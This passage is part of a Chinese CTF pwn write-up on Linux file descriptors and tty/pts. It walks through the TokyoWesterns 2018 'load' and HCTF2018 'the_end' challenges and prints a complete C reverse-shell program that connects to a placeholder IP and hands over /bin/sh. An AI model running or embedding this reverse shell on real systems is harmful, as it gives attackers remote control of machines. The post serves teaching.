<pre class="chroma"><code class="language-bash" data-lang="bash">others_reverse_shell <span class="o">[</span>master●<span class="o">]</span> ./file_descriptor
.......

others_reverse_shell <span class="o">[</span>master●<span class="o">]</span> pgrep file_descriptor
<span class="m">8942</span>
others_reverse_shell <span class="o">[</span>master●<span class="o">]</span> file /proc/8942/fd/0
/proc/8942/fd/0: symbolic link to /dev/pts/2
others_reverse_shell <span class="o">[</span>master●<span class="o">]</span> file /proc/8942/fd/1
/proc/8942/fd/1: symbolic link to /dev/pts/2
others_reverse_shell <span class="o">[</span>master●<span class="o">]</span> file /proc/8942/fd/2
/proc/8942/fd/2: symbolic link to /dev/pts/2
</code></pre></td></tr></table>
</div>
</div><p>都指向了 <code>/dev/pts/2</code> 这个文件，pts 是 tty 的一部分，后续会介绍。</p>
<p>在第一篇已经说到了 tty 子系统是用来管理终端的，对每一个连接的终端，都会有一个 tty 设备与其对应，关系如下：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-fallback" data-lang="fallback">                      +----------------+
                      |   TTY Driver   |
                      |                |
                      |   +-------+    |       +----------------+
 +------------+       |   |       |&lt;----------&gt;| User process A |
 | Terminal A |&lt;---------&gt;| ttyS0 |    |       +----------------+
 +------------+       |   |       |&lt;----------&gt;| User process B |
                      |   +-------+    |       +----------------+
                      |                |
                      |   +-------+    |       +----------------+
 +------------+       |   |       |&lt;----------&gt;| User process C |
 | Terminal B |&lt;---------&gt;| ttyS1 |    |       +----------------+
 +------------+       |   |       |&lt;----------&gt;| User process D |
                      |   +-------+    |       +----------------+
                      |                |
                      +----------------+
</code></pre></td></tr></table>
</div>
</div><p>在 shell 里使用 <code>tty</code> 命令可以查看当前 shell 被关联到了哪个 tty</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-bash" data-lang="bash">others_reverse_shell <span class="o">[</span>master●<span class="o">]</span> tty
/dev/pts/3
others_reverse_shell <span class="o">[</span>master●<span class="o">]</span> <span class="nb">echo</span> <span class="nb">test</span> &gt; /dev/pts/3
<span class="nb">test</span>
others_reverse_shell <span class="o">[</span>master●<span class="o">]</span> lsof /dev/pts/3
COMMAND   PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
zsh      <span class="m">8944</span>  m4x    0u   CHR  136,3      0t0    <span class="m">6</span> /dev/pts/3
zsh      <span class="m">8944</span>  m4x    1u   CHR  136,3      0t0    <span class="m">6</span> /dev/pts/3
zsh      <span class="m">8944</span>  m4x    2u   CHR  136,3      0t0    <span class="m">6</span> /dev/pts/3
zsh      <span class="m">8944</span>  m4x   10u   CHR  136,3      0t0    <span class="m">6</span> /dev/pts/3
lsof    <span class="m">10598</span>  m4x    0u   CHR  136,3      0t0    <span class="m">6</span> /dev/pts/3
lsof    <span class="m">10598</span>  m4x    1u   CHR  136,3      0t0    <span class="m">6</span> /dev/pts/3
lsof    <span class="m">10598</span>  m4x    2u   CHR  136,3      0t0    <span class="m">6</span> /dev/pts/3
</code></pre></td></tr></table>
</div>
</div><p>可以看到当前 shell 使用的是 /dev/pts/3，因此直接往 /dev/pts/3 写数据跟标准输出是一样的；</p>
<p>使用 lsof 可以看出当前 shell 和 lsof 进程的 stdin(0u)，stdout(1u)，stderr(2u) 都绑定到了这个 tty 上，此时它们的关系如下</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-fallback" data-lang="fallback">   Input    +--------------------------+    R/W     +------+
-----------&gt;|                          |&lt;----------&gt;| bash |
            |        /dev/pts/3        |            +------+
&lt;-----------|                          |&lt;----------&gt;| lsof |
   Output   | Foreground process group |    R/W     +------+
            +--------------------------+
</code></pre></td></tr></table>
</div>
</div><p>然后说一下 pty，使用 <code>man 7 pty</code> 查看 pty 的用户手册</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-fallback" data-lang="fallback">DESCRIPTION
       A  pseudoterminal  (sometimes abbreviated &#34;pty&#34;) is a pair of virtual character
       devices that provide a bidirectional communication channel.   One  end  of  the
       channel is called the master; the other end is called the slave.  
</code></pre></td></tr></table>
</div>
</div><p>pty 属于伪终端，“伪” 体现在 pty 是逻辑上的终端设备，但多用于模拟终端程序，比如使用 ssh，talnet 和 windows 下的 putty 等连接的终端时，此时并没有真正的设备连接到了主机，而是建立了一个<strong>伪终端</strong>来模拟各种行为。</p>
<p>从 man 手册中也可以看出 pty 分为 master 和 slave 两部分，其中 slave 部分称为 pts，master 称为 ptmx，二者结合实现 pty。工作流程可以简单的解释为进程通过调用 API 请求 ptmx 建立了一个 pts，然后会得到连接到 ptmx 的 fd 和一个新建的 pts（可以使用 <code>man pts</code> 查看更多细节）。</p>
<h4 id="构造-ropchain">构造 ropchain</h4>
<p>说了半天，再回到这道题目，虽然这道题目关闭了 stdin, stdout 和 stderr，pty 还在，换句话说，如果我们能控制 /dev/pts/? 的 fd 为 1，那么 puts(flag) 时就会把输出传递给 /dev/pts/? ，也就是我们能在显示屏上看到 flag。</p>
<p>总结一下思路：</p>
<ol>
<li>利用 open(&quot;/proc/self/fd/0&quot;, 0) 来构造 ropchain</li>
<li>ropchain 通过 open 和 read 把 flag 读到一个固定地址，同时控制 open(&quot;/dev/pty/?&quot;, 2) 返回的 fd 为 1</li>
<li>puts(flag) 时，系统调用为 write(1, flag, len(flag))，也就是 flag 的内容将会输出到显示屏上</li>
</ol>
<p><a href="https://github.com/0x01f/pwn_repo/blob/master/TokyoWesterns2018_load/ropchian.py">ropchian exploit here</a></p>
<h3 id="reverse-shell">reverse shell</h3>
<p>或者我们可以使用 reverse shell 来 get shell，这需要用到一些 procfs 的知识，不准备细讲，只需要知道可以通过往 /proc/self/mem 写数据更改 binary 内容即可（类似的题目有赛博地球杯的 <a href="https://github.com/0x01f/pwn_repo/tree/master/Cyber2017_fileManager">fileManager</a> 这道题目）。</p>
<p>通过 vmmap 可以看出 0x400000 - 0x401000 段具有可以行权限，且地址是固定的，因此我们可以控制 open(&quot;/proc/self/mem&quot;, 2) 返回的 fd 为 1，然后通过 puts(shellcode) 既可以将 shellcode 写到这段地址上，再控制 rip 到 shellcode 就可以建立一个 reverse shell（reverse shell 的经典题目有 pwnable.tw 的 kidding 等）。</p>
<p>总结一下思路：</p>
<ol>
<li>利用 open(&quot;/proc/self/fd/0&quot;, 0) 来构造 ropchain，ropchain 实现 open(&quot;/proc/self/mem&quot;, 2) 返回的 fd 为 1</li>
<li>通过 puts(shellcode) 将 shellcode 写到具有可执行权限的代码段，可以用 lseek 控制 puts 写的位置</li>
<li>控制 rip 为 shellcode 建立 reverse shell</li>
<li>可以使用 /dev/stdin 代替 /proc/self/fd/0，效果一样，可以给 shellcode 留下更多空间</li>
</ol>
<p><a href="https://github.com/0x01f/pwn_repo/blob/master/TokyoWesterns2018_load/reverse_shell.py">revrese shell exploit here</a></p>
<h3 id="reverse-shell-原理">reverse shell 原理</h3>
<p>简单介绍一下 reverse shell 的原理，先给出经典的 reverse shell 的建立方式</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span><span class="lnt">27
</span><span class="lnt">28
</span><span class="lnt">29
</span><span class="lnt">30
</span><span class="lnt">31
</span><span class="lnt">32
</span><span class="lnt">33
</span><span class="lnt">34
</span><span class="lnt">35
</span><span class="lnt">36
</span><span class="lnt">37
</span><span class="lnt">38
</span><span class="lnt">39
</span><span class="lnt">40
</span><span class="lnt">41
</span><span class="lnt">42
</span><span class="lnt">43
</span><span class="lnt">44
</span><span class="lnt">45
</span><span class="lnt">46
</span><span class="lnt">47
</span><span class="lnt">48
</span><span class="lnt">49
</span><span class="lnt">50
</span><span class="lnt">51
</span><span class="lnt">52
</span><span class="lnt">53
</span><span class="lnt">54
</span><span class="lnt">55
</span><span class="lnt">56
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-C" data-lang="C"><span class="n">others_reverse_shell</span> <span class="p">[</span><span class="n">master</span><span class="err">●</span><span class="p">]</span> <span class="n">bat</span> <span class="n">reverse_shell</span><span class="p">.</span><span class="n">c</span> 
<span class="err">───────┬─────────────────────────────────────────────────────────────────────────────────</span>
       <span class="err">│</span> <span class="nl">File</span><span class="p">:</span> <span class="n">reverse_shell</span><span class="p">.</span><span class="n">c</span>
<span class="err">───────┼─────────────────────────────────────────────────────────────────────────────────</span>
   <span class="mi">1</span>   <span class="err">│</span> <span class="c1">// reverse shell
</span><span class="c1"></span>   <span class="mi">2</span>   <span class="err">│</span> <span class="err">#</span><span class="n">include</span> <span class="o">&lt;</span><span class="n">sys</span><span class="o">/</span><span class="n">types</span><span class="p">.</span><span class="n">h</span><span class="o">&gt;</span>
   <span class="mi">3</span>   <span class="err">│</span> <span class="err">#</span><span class="n">include</span> <span class="o">&lt;</span><span class="n">sys</span><span class="o">/</span><span class="n">socket</span><span class="p">.</span><span class="n">h</span><span class="o">&gt;</span>
   <span class="mi">4</span>   <span class="err">│</span> <span class="err">#</span><span class="n">include</span> <span class="o">&lt;</span><span class="n">netinet</span><span class="o">/</span><span class="n">in</span><span class="p">.</span><span class="n">h</span><span class="o">&gt;</span>
   <span class="mi">5</span>   <span class="err">│</span> 
   <span class="mi">6</span>   <span class="err">│</span> <span class="err">#</span><span class="n">define</span> <span class="nb">NULL</span> <span class="mi">0</span>
   <span class="mi">7</span>   <span class="err">│</span> 
   <span class="mi">8</span>   <span class="err">│</span> <span class="kt">int</span> <span class="n">socket</span><span class="p">(</span><span class="kt">int</span> <span class="n">domain</span><span class="p">,</span> <span class="kt">int</span> <span class="n">type</span><span class="p">,</span> <span class="kt">int</span> <span class="n">protocal</span><span class="p">);</span>
   <span class="mi">9</span>   <span class="err">│</span> <span class="kt">int</span> <span class="n">connect</span><span class="p">(</span><span class="kt">int</span> <span class="n">sockfd</span><span class="p">,</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="n">addr</span><span class="p">,</span> <span class="n">socklen_t</span> <span class="n">addrlen</span><span class="p">);</span>
  <span class="mi">10</span>   <span class="err">│</span> <span class="kt">int</span> <span class="n">dup2</span><span class="p">(</span><span class="kt">int</span> <span class="n">oldfd</span><span class="p">,</span> <span class="kt">int</span> <span class="n">newfd</span><span class="p">);</span>
  <span class="mi">11</span>   <span class="err">│</span> <span class="kt">int</span> <span class="n">execve</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">filename</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="k">const</span> <span class="n">argv</span><span class="p">[],</span> <span class="kt">char</span> <span class="o">*</span><span class="k">const</span> <span class="n">envp</span><span class="p">[]);</span>
  <span class="mi">12</span>   <span class="err">│</span> <span class="kt">int</span> <span class="n">close</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">);</span>
  <span class="mi">13</span>   <span class="err">│</span> 
  <span class="mi">14</span>   <span class="err">│</span> <span class="kt">void</span> <span class="n">reverse_shell</span><span class="p">()</span>
  <span class="mi">15</span>   <span class="err">│</span> <span class="p">{</span>
  <span class="mi">16</span>   <span class="err">│</span>        <span class="kt">char</span><span class="o">*</span> <span class="n">address</span> <span class="o">=</span> <span class="s">&#34;your_ip&#34;</span><span class="p">;</span>
  <span class="mi">17</span>   <span class="err">│</span>        <span class="kt">int</span> <span class="n">port</span> <span class="o">=</span> <span class="n">your_port</span><span class="p">;</span>
  <span class="mi">18</span>   <span class="err">│</span> 
  <span class="mi">19</span>   <span class="err">│</span>        <span class="c1">// create a new socket but it has no address assigned yet
</span><span class="c1"></span>  <span class="mi">20</span>   <span class="err">│</span>        <span class="kt">int</span> <span class="n">sockfd</span> <span class="o">=</span> <span class="n">socket</span><span class="p">(</span><span class="n">AF_INET</span><span class="cm">/* 2 */</span><span class="p">,</span> <span class="n">SOCK_STREAM</span><span class="cm">/* 1 */</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
  <span class="mi">21</span>   <span class="err">│</span> 
  <span class="mi">22</span>   <span class="err">│</span>        <span class="c1">// create sockaddr_in structure for use with connect function
</span><span class="c1"></span>  <span class="mi">23</span>   <span class="err">│</span>        <span class="k">struct</span> <span class="n">sockaddr_in</span> <span class="n">sock_in</span><span class="p">;</span>
  <span class="mi">24</span>   <span class="err">│</span>        <span class="n">sock_in</span><span class="p">.</span><span class="n">sin_family</span> <span class="o">=</span> <span class="n">AF_INET</span><span class="p">;</span>
  <span class="mi">25</span>   <span class="err">│</span>        <span class="n">sock_in</span><span class="p">.</span><span class="n">sin_addr</span><span class="p">.</span><span class="n">s_addr</span> <span class="o">=</span> <span class="n">inet_addr</span><span class="p">(</span><span class="n">address</span><span class="p">);</span>
  <span class="mi">26</span>   <span class="err">│</span>        <span class="n">sock_in</span><span class="p">.</span><span class="n">sin_port</span> <span class="o">=</span> <span class="n">htons</span><span class="p">(</span><span class="n">port</span><span class="p">);</span>
  <span class="mi">27</span>   <span class="err">│</span> 
  <span class="mi">28</span>   <span class="err">│</span>        <span class="c1">// perform connect to target IP address and port
</span><span class="c1"></span>  <span class="mi">29</span>   <span class="err">│</span>        <span class="n">connect</span><span class="p">(</span><span class="n">sockfd</span><span class="p">,</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr</span><span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">sock_in</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr_in</span><span class="p">));</span>
  <span class="mi">30</span>   <span class="err">│</span> 
  <span class="mi">31</span>   <span class="err">│</span>        <span class="c1">// duplicate file descriptors for STDIN/STDOUT/STDERR
</span><span class="c1"></span>  <span class="mi">32</span>   <span class="err">│</span>        <span class="k">for</span><span class="p">(</span><span class="kt">int</span> <span class="n">n</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">n</span> <span class="o">&lt;=</span> <span class="mi">2</span><span class="p">;</span> <span class="n">n</span><span class="o">++</span><span class="p">)</span>
  <span class="mi">33</span>   <span class="err">│</span>        <span class="p">{</span>
  <span class="mi">34</span>   <span class="err">│</span>                <span class="n">dup2</span><span class="p">(</span><span class="n">sockfd</span><span class="p">,</span> <span class="n">n</span><span class="p">);</span>
  <span class="mi">35</span>   <span class="err">│</span>        <span class="p">}</span>
  <span class="mi">36</span>   <span class="err">│</span> 
  <span class="mi">37</span>   <span class="err">│</span>        <span class="c1">// execve(&#34;/bin/sh&#34;, 0, 0)
</span><span class="c1"></span>  <span class="mi">38</span>   <span class="err">│</span>        <span class="n">execve</span><span class="p">(</span><span class="s">&#34;/bin/sh&#34;</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
  <span class="mi">39</span>   <span class="err">│</span> 
  <span class="mi">40</span>   <span class="err">│</span>        <span class="n">close</span><span class="p">(</span><span class="n">sockfd</span><span class="p">);</span>
  <span class="mi">41</span>   <span class="err">│</span> 
  <span class="mi">42</span>   <span class="err">│</span>        <span class="k">return</span><span class="p">;</span>
  <span class="mi">43</span>   <span class="err">│</span> <span class="p">}</span>
  <span class="mi">44</span>   <span class="err">│</span> 
  <span class="mi">45</span>   <span class="err">│</span> 
  <span class="mi">46</span>   <span class="err">│</span> <span class="kt">int</span> <span class="n">main</span><span class="p">()</span>
  <span class="mi">47</span>   <span class="err">│</span> <span class="p">{</span>
  <span class="mi">48</span>   <span class="err">│</span>        <span class="n">reverse_shell</span><span class="p">();</span>
  <span class="mi">49</span>   <span class="err">│</span> 
  <span class="mi">50</span>   <span class="err">│</span>        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
  <span class="mi">51</span>   <span class="err">│</span> <span class="p">}</span>
<span class="err">───────┴─────────────────────────────────────────────────────────────────────────────────</span>
</code></pre></td></tr></table>
</div>
</div><p>如果前两篇看懂的话，那么参考这个代码，reverse shell 的原理就很好理解了</p>
<ol>
<li>建立一个 socket，此时会新建一个 fd</li>
<li>给这个 socket 分配 ip 和 port</li>
<li>通过 dup2，将 socket 的 fd 复制到 0，1 和 2 上，这样 shell 的 io 就完全通过建立的 socket 了，这时如果我们监听这个 ip 和 port，就相当于拿到了一个 shell</li>
</ol>
<h2 id="level-4-hctf2018---the_end">level 4: HCTF2018 - the_end</h2>
<p><a href="https://veritas501.space">veritas501师傅</a> 出的题目，很独特，关闭了 stdout 和 stderr，但保留了 stdin。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">void</span> <span class="kr">__fastcall</span> <span class="n">__noreturn</span> <span class="nf">main</span><span class="p">(</span><span class="kr">__int64</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">a2</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">a3</span><span class="p">)</span>
<span class="p">{</span>
  <span class="kt">signed</span> <span class="kt">int</span> <span class="n">i</span><span class="p">;</span> <span class="c1">// [rsp+4h] [rbp-Ch]
</span><span class="c1"></span>  <span class="kt">void</span> <span class="o">*</span><span class="n">buf</span><span class="p">;</span> <span class="c1">// [rsp+8h] [rbp-8h]
</span><span class="c1"></span>
  <span class="n">sleep</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">&#34;here is a gift %p, good luck ;)</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">sleep</span><span class="p">);</span>
  <span class="n">fflush</span><span class="p">(</span><span class="n">_bss_start</span><span class="p">);</span>
  <span class="n">close</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
  <span class="n">close</span><span class="p">(</span><span class="mi">2</span><span class="p">);</span>
  <span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;=</span> <span class="mi">4</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span>
  <span class="p">{</span>
    <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">buf</span><span class="p">,</span> <span class="mi">8uLL</span><span class="p">);</span>
    <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">1uLL</span><span class="p">);</span>
  <span class="p">}</span>
  <span class="n">exit</span><span class="p">(</span><span class="mi">1337</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></td></tr></table>
</div>
</div><p>解法就不说了，可以参考 <a href="https://bysec.io/hctf/writeup.html#the-end">官方 writeup</a>。但更多人用的应该是非预期解直接使用 one_gadget。</p>
<p>总之，可以用某种方式拿到一个交互式的 shell （因为 stdout 已经被关闭，所以不会有输出）。可以通过 <code>cat flag &gt;&amp;0</code>， <code>exec 1&gt;&amp;0; cat flag</code> 等方法得到 flag。</p>
<p>为什么可以通过 <code>stdin</code> 来输出呢？因为</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-bash" data-lang="bash">~ file /proc/self/fd/0
/proc/self/fd/0: symbolic link to /dev/pts/3
</code></pre></td></tr></table>
</div>
</div><p><code>stdin</code> 实际也是 pts 的软连接，因此可以输出。</p>
<p>需要注意的是，很多人在做这道题目时可能远程成功了，但本地使用 <code>pwnlib.process</code> 时失败，这是因为在 pwntools 的 <a href="https://github.com/Gallopsled/pwntools/blob/dev/pwnlib/tubes/tube.py#L798-L815">源码</a> 中有这样一段</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-python" data-lang="python">        <span class="k">try</span><span class="p">:</span>
            <span class="k">while</span> <span class="ow">not</span> <span class="n">go</span><span class="o">.</span><span class="n">isSet</span><span class="p">():</span>
                <span class="k">if</span> <span class="n">term</span><span class="o">.</span><span class="n">term_mode</span><span class="p">:</span>
                    <span class="n">data</span> <span class="o">=</span> <span class="n">term</span><span class="o">.</span><span class="n">readline</span><span class="o">.</span><span class="n">readline</span><span class="p">(</span><span class="n">prompt</span> <span class="o">=</span> <span class="n">prompt</span><span class="p">,</span> <span class="nb">float</span> <span class="o">=</span> <span class="bp">True</span><span class="p">)</span>
                <span class="k">else</span><span class="p">:</span>
                    <span class="n">data</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>	<span class="o">&lt;==</span> <span class="n">exception</span>

                <span class="k">if</span> <span class="n">data</span><span class="p">:</span>
                    <span class="k">try</span><span class="p">:</span>
                        <span class="bp">self</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
                    <span class="k">except</span> <span class="ne">EOFError</span><span class="p">:</span>
                        <span class="n">go</span><span class="o">.</span><span class="n">set</span><span class="p">()</span>
                        <span class="bp">self</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="s1">&#39;Got EOF while sending in interactive&#39;</span><span class="p">)</span>
                <span class="k">else</span><span class="p">:</span>
                    <span class="n">go</span><span class="o">.</span><span class="n">set</span><span class="p">()</span>
        <span class="k">except</span> <span class="ne">KeyboardInterrupt</span><span class="p">:</span>
            <span class="bp">self</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="s1">&#39;Interrupted&#39;</span><span class="p">)</span>
            <span class="n">go</span><span class="o">.</span><span class="n">set</span><span class="p">()</span>
</code></pre></td></tr></table>
</div>
</div><p><code>interactive()</code> 时程序试图从 1 读取内容，但此时只有 0，于是就触发了异常；但使用 <code>pwnlib.remote</code> 时是直接建立了一个 socket，因此不会触发异常（具体可以分析源码）</p>
<p>还要注意的是，当使用 <code>socat</code>，<code>xinted</code> 等挂载题目时，0, 1, 2 实际上已经不是 <code>stdin, stdout, stderr</code> 而是 socket 了，但因为端口转发的原因我们可以认为仍然是 <code>stdin, stdout, stderr</code>，这也提醒我们遇到和 fd 有关的题目时，可以本地挂载然后使用 <code>pwnlib.remote</code> 测试以减少不必要的麻烦。</p>
<h2 id="references">References</h2>
<p><a href="https://lordidiot.github.io/2018-09-03/tokyowesterns-ctf-2018-load-pwn/">https://lordidiot.github.io/2018-09-03/tokyowesterns-ctf-2018-load-pwn/</a></p>
<p><a href="http://nano-chicken.blogspot.com/2014/07/linuxttyptypts.html">http://nano-chicken.blogspot.com/2014/07/linuxttyptypts.html</a></p>
<p><a href="https://segmentfault.com/a/1190000009082089">https://segmentfault.com/a/1190000009082089</a></p>
<p><a href="http://shell-storm.org/shellcode/files/shellcode-219.php">http://shell-storm.org/shellcode/files/shellcode-219.php</a></p>
<p><a href="http://tacxingxing.com/2018/01/19/procfs/">http://tacxingxing.com/2018/01/19/procfs/</a></p>
<p><a href="https://tdmathison.github.io/blog/slae32-1/">https://tdmathison.github.io/blog/slae32-1/</a></p>
<p><a href="https://tdmathison.github.io/blog/slae32-2/">https://tdmathison.github.io/blog/slae32-2/</a></p>
<p><a href="https://xz.aliyun.com/t/2548">https://xz.aliyun.com/t/2548</a></p>
<p><a href="https://xz.aliyun.com/t/2549">https://xz.aliyun.com/t/2549</a></p>

    </div>

    
    


    
    

    <footer class="post-footer">
      <div class="post-tags">
          <a href="https://bash-c.github.io/tags/file-descriptor/">file-descriptor</a>
          <a href="https://bash-c.github.io/tags/pwn/">pwn</a>
          <a href="https://bash-c.github.io/tags/os/">os</a>
          
        </div>

      
      <nav class="post-nav">
        
          <a class="prev" href="/post/jarvisoj-pwn-writeup/">
            
            <i class="iconfont">
              <svg  class="icon" viewBox="0 0 1024 1024" version="1.1"
  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
  width="18" height="18">
  <path d="M691.908486 949.511495l75.369571-89.491197c10.963703-12.998035 10.285251-32.864502-1.499144-44.378743L479.499795 515.267417 757.434875 204.940602c11.338233-12.190647 11.035334-32.285311-0.638543-44.850487l-80.46666-86.564541c-11.680017-12.583596-30.356378-12.893658-41.662889-0.716314L257.233596 494.235404c-11.332093 12.183484-11.041474 32.266891 0.657986 44.844348l80.46666 86.564541c1.772366 1.910513 3.706415 3.533476 5.750981 4.877077l306.620399 321.703933C662.505829 963.726242 680.945807 962.528973 691.908486 949.511495z"></path>
</svg>

            </i>
            <span class="prev-text nav-default">JarvisOJ Pwn Writeup</span>
            <span class="prev-text nav-mobile">Prev</span>
          </a>
        
          <a class="next" href="/post/play-with-file-descriptor-2/">
            <span class="next-text nav-default">Play with file descriptor(II)</span>
            <span class="prev-text nav-mobile">Next</span>
            
            <i class="iconfont">
              <svg class="icon" viewBox="0 0 1024 1024" version="1.1"
  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
  width="18" height="18">
  <path d="M332.091514 74.487481l-75.369571 89.491197c-10.963703 12.998035-10.285251 32.864502 1.499144 44.378743l286.278095 300.375162L266.565125 819.058374c-11.338233 12.190647-11.035334 32.285311 0.638543 44.850487l80.46666 86.564541c11.680017 12.583596 30.356378 12.893658 41.662889 0.716314l377.434212-421.426145c11.332093-12.183484 11.041474-32.266891-0.657986-44.844348l-80.46666-86.564541c-1.772366-1.910513-3.706415-3.533476-5.750981-4.877077L373.270379 71.774697C361.493148 60.273758 343.054193 61.470003 332.091514 74.487481z"></path>
</svg>

            </i>
          </a>
      </nav>
    </footer>
  </article>

  
  

  
  

  
  
    <div class="post bg-white">
      <script src="https://utteranc.es/client.js"
            repo= "bash-c/bash-c.github.io"
            issue-term="pathname"
            crossorigin="anonymous"
            async>
      </script>
    </div>
  

  

  

  
  
    



        </div>
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="icon-links">
  
  
    <a href="mailto:aboultraman@gmail.com" rel="me noopener" class="iconfont"
      title="email" >
      <svg class="icon" viewBox="0 0 1451 1024" version="1.1"
  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
  width="36" height="36">
